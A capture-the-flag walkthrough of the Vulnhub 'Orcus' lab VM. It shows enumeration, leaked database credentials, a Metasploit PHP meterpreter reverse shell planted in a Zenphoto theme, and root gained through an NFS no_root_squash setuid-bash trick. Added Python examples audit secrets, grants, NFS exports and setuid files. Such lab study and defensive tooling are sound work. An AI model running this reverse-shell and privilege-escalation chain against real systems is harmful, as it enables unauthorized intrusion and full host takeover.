Vulnhub Walkthrough: Orcus

Setup

Go to the Orcus entry on Vulnhub, read the description, download the .ova file and load it into VirtualBox. The description of the machine is:

Welcome to Orcus
This is a vulnerable machine I created for the Hackfest 2016 CTF http://hackfest.ca/

Difficulty : Hard

Tips:

If you're stuck, enumerate more! Seriously, take each service running on the system and enumerate them more!

Goals: This machine is intended to take a lot of enumeration and understanding of Linux system.

There are 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box that is different from the others from this series (Quaoar and Sedna) find why it's different.

Feedback: This is my third vulnerable machine, please give me feedback on how to improve! @ViperBlackSkull on Twitter simon.nolet@hotmail.com

Special Thanks to madmantm for testing this machine

SHA-256 : 79B1D93C60E664D70D8EB3C0CDF1AD98BF2B95036C84F87EEF065FA71C1AE51E

The image that boots up looks like this:

[Screenshot: Orcus VM boot screen]

There are four tasks to complete/flags to capture:

  1. Get a shell
  2. Get root access
  3. There is a post exploitation flag on the box
  4. There is something on this box that is different from the others in this series (Quaoar and Sedna); find out why it's different

I haven't seen Quaoar or Sedna yet, so I will only attempt tasks 1-3 for the time being.

Information Gathering

As usual, we should start by finding out what is running on the machine to see the possible attack vectors.

Service Enumeration

To see what services are running, we use nmap:

nmap -p- -A 192.168.1.109
Host is up (0.00095s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp    open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php 
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php 
| /exponent_version.php /getswversion.php /login.php /overrides.php 
| /popup.php /selector.php /site_rss.php /source_selector.php 
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE CAPA TOP UIDL RESP-CODES STLS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: ENABLE more SASL-IR have IDLE capabilities ID listed IMAP4rev1 post-login LITERAL+ OK Pre-login LOGINDISABLEDA0001 STARTTLS LOGIN-REFERRALS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
993/tcp   open  ssl/imap    Dovecot imapd
|_imap-capabilities: ENABLE SASL-IR AUTH=PLAINA0001 IDLE capabilities ID more IMAP4rev1 post-login LITERAL+ OK have listed Pre-login LOGIN-REFERRALS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) PIPELINING USER CAPA TOP UIDL RESP-CODES AUTH-RESP-CODE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
37781/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
41212/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
41909/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
45914/tcp open  nlockmgr    1-4 (RPC #100021)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: 
|   NetBIOS computer name: ORCUS
|   Workgroup: WORKGROUP
|_  System time: 2018-08-28T07:32:12-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.25 seconds

There is a lot of information here, but for now the interesting takeaways are:

  1. The machine is running Ubuntu Linux
  2. There is a website running on the normal port 80 for HTTP traffic
  3. There are SSH services running on port 22 (the normal port) and also on port 443 (usually HTTPS web traffic). One of these SSH services may be fake or configured significantly differently.
  4. There is a mail service (Dovecot IMAP) running on the normal ports 143 and 993
  5. There are various NFS services exposed

I come from a web developer background so I like to start by snooping around on the website.

Website Enumeration

The easiest way to start is just to use a browser and see what we can see:

[Screenshot: Orcus website homepage]

Clicking on the image yields the following:

[Screenshot: Orcus website click-through page]

From here, there is not much more we can do with the browser.

So let's check what else is on the webserver with other tools.

curl 192.168.1.109/robots.txt
User-agent: *
Crawl-delay: 5
Disallow: /exponent.js.php
Disallow: /exponent.js2.php
Disallow: /exponent.php
Disallow: /exponent_bootstrap.php
Disallow: /exponent_constants.php
Disallow: /exponent_php_setup.php
Disallow: /exponent_version.php
Disallow: /getswversion.php
Disallow: /login.php
Disallow: /overrides.php
Disallow: /popup.php
Disallow: /selector.php
Disallow: /site_rss.php
Disallow: /source_selector.php
Disallow: /thumb.php
Disallow: /ABOUT.md
Disallow: /CHANGELOG.md
Disallow: /CREDITS.md
Disallow: /INSTALLATION.md
Disallow: /LICENSE
Disallow: /README.md
Disallow: /RELEASE.md
Disallow: /TODO.md
Disallow: /cgi-bin/
Disallow: /cart/
Disallow: /login/
Disallow: /users/
Disallow: /files/
Disallow: /tmp/
Disallow: /search/
# Sitemap: http://www.mysite.com/sitemap.xml

It turns out there is quite a lot on the webserver, and the robots.txt file gives a lot of it away. By looking around the files and directories above in a browser, we can find that the CMS in use is Exponent CMS v2.3.9. However, the login.php page shows the database is currently offline.

Sometimes this means there is a misconfiguration that can be exploited, and sometimes it means there is simply nothing set up yet. In this case, we can carry on with a breadth-first search to see if we can find any other low-hanging fruit hidden on the website.

dirb http://192.168.1.109
==> DIRECTORY: http://192.168.1.109/admin/ 
==> DIRECTORY: http://192.168.1.109/backups/ 
==> DIRECTORY: http://192.168.1.109/cron/ 
==> DIRECTORY: http://192.168.1.109/external/ 
==> DIRECTORY: http://192.168.1.109/FCKeditor/ 
==> DIRECTORY: http://192.168.1.109/files/ 
==> DIRECTORY: http://192.168.1.109/framework/ 
==> DIRECTORY: http://192.168.1.109/install/ 
==> DIRECTORY: http://192.168.1.109/javascript/ 
==> DIRECTORY: http://192.168.1.109/phpmyadmin/ 
==> DIRECTORY: http://192.168.1.109/themes/ 
==> DIRECTORY: http://192.168.1.109/tmp/ 
+ http://192.168.1.109/index.html (CODE:200|SIZE:101) 
+ http://192.168.1.109/webalizer (CODE:200|SIZE:0) 
+ http://192.168.1.109/xmlrpc.php (CODE:200|SIZE:0) 
+ http://192.168.1.109/index.php (CODE:200|SIZE:4564) 
+ http://192.168.1.109/server-status (CODE:403|SIZE:301) 
... 

By going to the /admin directory in a browser, we are greeted with an empty white page, but the page source contains an HTML comment:

<!-- This is a backup taken from the backups/-->

So we should definitely follow the trail to the backups directory - it's often a dumping ground for all sorts of weird and wonderful files and folders, especially secrets.

Sure enough, there is a file named "SimplePHPQuiz-Backupz.tar.gz" that can be downloaded and, once extracted, we can see database credentials in the "includes/db_conn.php" file:

DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

We should take a note of these credentials - they will be useful in a moment.
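A backup archive left in a web root is a secrets-scanning problem before it is anything else. The following is an added example (not code from the original post or from the SimplePHPQuiz project) of how a defender could sweep such an archive in memory and report credential-looking definitions with the values masked. The sample archive, the `define()`/`$variable` regexes and the list of file suffixes worth scanning are all constructed for this illustration.

```python
import io
import re
import tarfile

# Two common ways PHP config files hold credentials: define('KEY', 'value') and
# $variable = 'value'. Only keys that look like secrets are reported, so the
# DB_USER/DB_HOST/DB_NAME lines from db_conn.php are ignored and DB_PASSWORD is not.
CRED_PATTERNS = [
    re.compile(
        r"""define\s*\(\s*['"](?P<key>\w*(?:PASS|PWD|SECRET|TOKEN|KEY)\w*)['"]\s*,\s*['"](?P<val>[^'"]*)['"]""",
        re.IGNORECASE,
    ),
    re.compile(
        r"""\$(?P<key>\w*(?:pass|pwd|secret|token)\w*)\s*=\s*['"](?P<val>[^'"]*)['"]""",
        re.IGNORECASE,
    ),
]

# Only text-like members are worth scanning; archives of a web root also hold images.
SCAN_SUFFIXES = (".php", ".inc", ".ini", ".env", ".conf", ".yml", ".yaml", ".json")


def mask(secret):
    """Keep the first and last character so a finding can be matched to its file without leaking the value."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[0] + "*" * (len(secret) - 2) + secret[-1]


def scan_text(path, text):
    """Return (path, key, masked_value) for every credential definition found in one file."""
    hits = []
    for pattern in CRED_PATTERNS:
        for m in pattern.finditer(text):
            hits.append((path, m.group("key"), mask(m.group("val"))))
    return hits


def scan_archive(data):
    """Scan a .tar.gz held in memory (bytes) and return all credential hits."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            # Skip directories, symlinks, oversized members and non-text files.
            if not member.isfile() or member.size > 1_000_000:
                continue
            if not member.name.lower().endswith(SCAN_SUFFIXES):
                continue
            fh = tar.extractfile(member)
            if fh is None:
                continue
            text = fh.read().decode("utf-8", errors="replace")
            hits.extend(scan_text(member.name, text))
    return hits


def build_sample_archive():
    """Constructed sample backup: a db_conn.php with the same defines as the one found on Orcus."""
    files = {
        "SimplePHPQuiz/includes/db_conn.php": (
            "<?php\n"
            "DEFINE ('DB_USER', 'dbuser');\n"
            "DEFINE ('DB_PASSWORD', 'dbpassword');\n"
            "DEFINE ('DB_HOST', 'localhost');\n"
            "DEFINE ('DB_NAME', 'quizdb');\n"
        ),
        "SimplePHPQuiz/README.md": "SimplePHPQuiz backup\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            payload = content.encode("utf-8")
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    for path, key, value in scan_archive(build_sample_archive()):
        print(f"{path}: {key} = {value}")
```

Running the same function over every archive found under a web root (or over a CI artifact before it is published) turns the "dumping ground" problem into a repeatable check; the masking keeps the report itself from becoming a second copy of the secret.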

Accessing the Database

Looking back through the dirb output, we can see a /phpmyadmin directory present on the webserver. It makes most sense to try the database credentials we have found in the phpMyAdmin application to access any MySQL databases.

Fortunately, by going to http://192.168.1.109/phpmyadmin and entering the credentials, we can log in with a user that has all privileges:

SHOW GRANTS; 
GRANT ALL PRIVILEGES ON *.* TO 'dbuser'@'localhost';
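The application account having ALL PRIVILEGES ON *.* is the finding here, and it is easy to check for at scale. Below is an added example (not from the original post) that parses SHOW GRANTS output and flags least-privilege violations: administrative privileges, global scope, and WITH GRANT OPTION. The first sample line is the grant shown above; the other sample lines and the set of privileges treated as administrative are constructed for this illustration.

```python
import re

# One GRANT statement as printed by SHOW GRANTS: privileges, scope (db.table),
# grantee, and an optional WITH GRANT OPTION clause.
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<who>\S+?)"
    r"(?P<grant_option>\s+WITH\s+GRANT\s+OPTION)?\s*;?$",
    re.IGNORECASE,
)

# Privileges that let an application account act on the server rather than on its own schema.
ADMIN_PRIVS = {"ALL", "ALL PRIVILEGES", "SUPER", "FILE", "PROCESS", "RELOAD", "SHUTDOWN", "CREATE USER"}


def audit_grant(statement):
    """Describe one GRANT line and the least-privilege violations in it.
    Returns None when the line is not a GRANT statement."""
    m = GRANT_RE.match(statement.strip())
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    scope = m.group("scope")
    findings = []
    admin = sorted(privs & ADMIN_PRIVS)
    if admin:
        findings.append("administrative privilege: " + ", ".join(admin))
    # USAGE ON *.* is MySQL's way of saying "no privileges"; anything else global is a finding.
    if scope == "*.*" and privs != {"USAGE"}:
        findings.append("global scope (*.*)")
    if m.group("grant_option"):
        findings.append("WITH GRANT OPTION")
    return {"account": m.group("who"), "scope": scope, "privileges": sorted(privs), "findings": findings}


def audit_grants(statements):
    """Audit several SHOW GRANTS lines and return only the ones with findings."""
    results = (audit_grant(s) for s in statements)
    return [r for r in results if r and r["findings"]]


# Constructed sample: the first line is what SHOW GRANTS returned for dbuser on Orcus;
# the others show what a properly scoped application account looks like.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'dbuser'@'localhost';",
    "GRANT USAGE ON *.* TO 'quizapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `quizdb`.* TO 'quizapp'@'localhost'",
    "GRANT SELECT ON `zencart`.* TO 'shop'@'%' WITH GRANT OPTION",
]

if __name__ == "__main__":
    for r in audit_grants(SAMPLE_GRANTS):
        print(r["account"], r["scope"], "->", "; ".join(r["findings"]))
```

The fix on the database side is the third sample line: a per-application account with DML rights on its own schema only, which is what the quiz application actually needed.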

For interest's sake, we can look around to see what else is in the database. Although there are no other interesting users, there are a number of interesting databases.

Note: We can see a trail left behind from the vm creator "Viper" with his host "viperhard" in the mysql users table.

Back to the databases, we have:

  • Adem - This is an empty database and it's not clear what it is used for
  • mysql - This is an internal MySQL database
  • information_schema - This is an internal MySQL database
  • PHPFusion - This could support a lightweight CMS (the database is empty)
  • phpmyadmin - We are using this system right now
  • quizdb - This is an empty database
  • SimplePHPQuiz - This is an empty database
  • sys - This is an internal MySQL database
  • zencart - This could support an ecommerce website
  • zenphoto - This could support a media CMS (the database is empty)

Note: the usual MySQL file read/write tricks will not work here, not least because secure_file_priv is set.

Further Web Enumerations

Given the above database names and the premise that databases often support websites of a similar name, we can try a URL named after each database (for example http://192.168.1.109/zenphoto/) in a browser to see if anything is running.

Only zenphoto yields a result and luckily for us it has not yet been configured. This means we can set it up ourselves and have access to the application and whatever it can do.

Zenphoto Exploits

Looking around the different pages on the website, we can read the following on the themes tab:

You can edit files from custom themes. Official themes shipped with Zenphoto are not editable, since your changes would be lost on next update. If you want to customize an official theme, please first duplicate it. This will place a copy in your /themes folder for you to edit.

So the answer is right in front of us - duplicate and edit a theme with reverse shell code. We can edit the theme index.php page for ease but this is quite overt - it would be better to edit a different file or add a new file to be covert instead.

To generate the php reverse shell, we can use msfvenom:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=4444

Before going to the web page, be sure to start a handler with Metasploit:

msfconsole
msf > use multi/handler 
msf exploit(handler)> set payload php/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.110
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> run

Now reloading the website at http://192.168.1.109/zenphoto/ yields us a meterpreter shell.

Unprivileged Actions

First things first, in the meterpreter shell we can capture a flag:

meterpreter > cd /var/www 
meterpreter > cat flag.txt 
868c889965b7ada547fae81f922e45c4 

We can then get a nicer shell with a bit of python:

meterpreter > shell 
Process 3097 created. 
Channel 0 created.  

python -c 'import pty; pty.spawn("/bin/bash")' 

www-data@Orcus:/var/www$

Privilege Escalation

Escalating our privileges to root often involves some sort of kernel or OS vulnerability. In this case though, we have another, fairly straightforward, way in.

We should remember the NFS services from the beginning of our information gathering stage and check their configuration. In the best case scenario, we can upload, edit and execute files.

The configuration is available at /etc/exports:

www-data@Orcus:/tmp$ cat /etc/exports 
cat /etc/exports 
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5). 
# 
# Example for NFSv2 and NFSv3: 
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
# 
# Example for NFSv4: 
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) 
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) 
/tmp *(rw,no_root_squash)

The "no_root_squash" option means a file uploaded as root from our local machine stays owned by root on the server, instead of being squashed to the anonymous user (nobody). This provides our means of privilege escalation:

Note: This also requires installing the nfs-common package if it is not present on your system.
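From the defender's side, the dangerous line in /etc/exports is a combination of three settings: any host may mount, the export is writable, and root is not squashed. The following is an added example (not code from the original post) that parses exports(5) syntax the way exportfs reads it, including comments, backslash continuations and the classic "host (options)" typo that silently exports to everyone, and rates each export. The sample file reuses the /tmp line found on Orcus; the other sample lines and the severity rules are constructed for this illustration.

```python
import re

# Constructed sample: the first export is the one found in Orcus's /etc/exports; the rest
# illustrate a continuation line and the "host (options)" typo that exports(5) warns about.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
/tmp *(rw,no_root_squash)
/srv/homes 192.168.1.0/24(ro,sync,no_subtree_check) \\
           10.0.0.5(rw,sync,no_subtree_check)
/srv/oops 192.168.1.20 (rw,no_root_squash)
"""

# An empty client spec, like "*", means any host can mount the export.
WORLD_CLIENTS = {"*", ""}


def parse_exports(text):
    """Return [(path, [(client, {options})])] from exports(5) text: comments removed,
    backslash continuations joined, one entry per client spec."""
    logical, buf = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            logical.append(buf.strip())
        buf = ""
    exports = []
    for line in logical:
        path, *specs = line.split()
        clients = []
        for spec in specs or [""]:          # a path with no client spec is exported to everyone
            m = re.match(r"^([^(]*)(?:\((.*)\))?$", spec)
            if m is None:                   # malformed spec: keep it visible as a client with no options
                clients.append((spec, set()))
                continue
            client, opts = m.group(1), m.group(2)
            options = {o.strip() for o in opts.split(",")} if opts else set()
            clients.append((client, options))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Flag exports that let any host mount, keep remote root as root, or are writable."""
    findings = []
    for path, clients in parse_exports(text):
        for client, options in clients:
            issues = []
            if client in WORLD_CLIENTS:
                issues.append("any host may mount")
            if "no_root_squash" in options:
                issues.append("no_root_squash")
            if "rw" in options:
                issues.append("writable")
            if "insecure" in options:
                issues.append("insecure (accepts non-privileged source ports)")
            if not issues:
                continue
            # All three together is exactly the Orcus condition: a remote root can write
            # root-owned, setuid files into the export.
            critical = {"any host may mount", "no_root_squash", "writable"} <= set(issues)
            findings.append({
                "path": path,
                "client": client or "(everyone)",
                "severity": "critical" if critical else "warning",
                "issues": issues,
            })
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f['severity']:8} {f['path']} {f['client']}: {', '.join(f['issues'])}")
```

The third sample line is worth noting: `192.168.1.20 (rw,no_root_squash)` with a space gives 192.168.1.20 the defaults and hands rw,no_root_squash to the world, which the parser reports as a separate "(everyone)" client. The remediation for the Orcus line is to restrict the client list and drop no_root_squash (root_squash is the default), or not export /tmp at all.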

Now there are a few ways to get root. In this case, we can simply copy over the /bin/bash file, change its permissions, execute the file and become root.

Copy /bin/bash to the nfs mount from the remote machine:

www-data@Orcus:/tmp$ cp /bin/bash /tmp/makemyday

Change the file permissions from the local machine:

root@kali:/mnt$ chown root: makemyday
root@kali:/mnt$ chmod u+s makemyday

Execute the file:

www-data@Orcus:/tmp$ ./makemyday -p
./makemyday -p

makemyday-4.3# id 
id 
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data) 
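The artefact this leaves behind is a setuid-root copy of bash sitting in /tmp, which is exactly what a host-integrity check should catch. Below is an added example (not from the original post) of that detection: classify files by mode and owner, ignore symlinks, and report setuid-root files that are not in a known baseline. The baseline set and the sample file listing are constructed for this illustration; a real deployment would take the baseline from a clean image of the same build.

```python
import os
import stat

# setuid-root binaries a stock Ubuntu install is expected to carry. Assumed baseline for
# illustration only; take the real one from a clean image of the same build.
BASELINE_SETUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/newgrp",
}


def is_setuid_root(mode, uid):
    """True for a regular file (not a symlink or directory) carrying the setuid bit and owned by uid 0."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def unexpected_setuid(entries, baseline=BASELINE_SETUID):
    """entries: iterable of (path, st_mode, st_uid). Returns the paths that are setuid root
    but absent from the baseline, which is what a planted copy of /bin/bash looks like."""
    return [path for path, mode, uid in entries if is_setuid_root(mode, uid) and path not in baseline]


def collect_entries(root):
    """Walk a directory tree (an NFS export, /tmp, or / on a host) and return (path, mode, uid).
    lstat is used so a symlink pointing at a real setuid binary is not counted as one."""
    entries = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; temp directories churn
            entries.append((path, st.st_mode, st.st_uid))
    return entries


# Constructed listing standing in for a live scan of an Orcus-like host. Values are
# st_mode: 0o104755 = regular file, setuid, rwxr-xr-x; 0o100644 = plain file; 0o120777 = symlink.
SAMPLE_ENTRIES = [
    ("/bin/su", 0o104755, 0),           # expected setuid root, in the baseline
    ("/tmp/makemyday", 0o104755, 0),    # copy of bash with u+s, owned by root: not in the baseline
    ("/tmp/flag.txt", 0o100644, 33),    # ordinary www-data file
    ("/tmp/su_link", 0o120777, 0),      # symlink: its mode bits say nothing about the target
    ("/tmp/myhelper", 0o104755, 33),    # setuid, but owned by www-data rather than root
]

if __name__ == "__main__":
    for path in unexpected_setuid(SAMPLE_ENTRIES):
        print("unexpected setuid-root file:", path)
    # Live use on a host: unexpected_setuid(collect_entries("/tmp"))
```

The same logic is what `find / -perm -4000 -uid 0` gives you at the shell; the value of the baseline comparison is that it turns a long listing into a short list of things that were not there yesterday. Mounting world-writable exports and /tmp with nosuid removes the attack path entirely, since the kernel then ignores the setuid bit on execution.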

There's a flag in /root:

makemyday-4.3# cd /root 
cd /root 

makemyday-4.3# cat flag.txt 
cat flag.txt 
807307b49314f822985d0410de7d8bfe

Bonus Content

You may have noticed the ssh-creds.bak file in the /backups directory towards the start that we couldn't download. We can now see the contents of this file in the shell:

mmdrd-4.3# cat ssh-creds.bak
cat ssh-creds.bak
root:123456

A simple Google search of this username/password combination leads us to pages about Kippo Honeypots - remember the two ssh services running at the start too?

A little bit more digging around Kippo leads us to another flag:

mmdrd-4.3# cat /etc/kippo/data/userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!

TH!SP4SSW0RDIS4Fl4G = This password is a flag.
